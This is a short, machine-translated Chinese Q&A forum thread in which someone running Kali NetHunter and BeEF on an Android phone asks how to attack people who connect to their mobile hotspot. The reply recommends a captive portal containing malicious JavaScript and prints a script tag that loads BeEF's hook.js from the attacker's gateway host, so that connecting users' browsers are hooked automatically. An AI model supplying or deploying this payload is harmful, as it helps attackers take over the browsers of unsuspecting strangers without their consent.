我在我的机器人上运行Kali Nethunter,我能够让牛肉xss运行得很好。 js钩子在http://gateway:3000/hooks.js上 但我不能使用mitmf注入,因为我正在运行我自己的Android手机热点。 是否有任何程序可以让我对连接到我的热点的客户进行攻击?
答案 0 :(得分:0)
如果您控制热点,请在HTML代码中设置包含恶意JS的强制网络门户。
示例:
<script src=”http://gateway:3000/hook.js” type=”text/javascript”></script>
这样他们必须自动挂钩你;)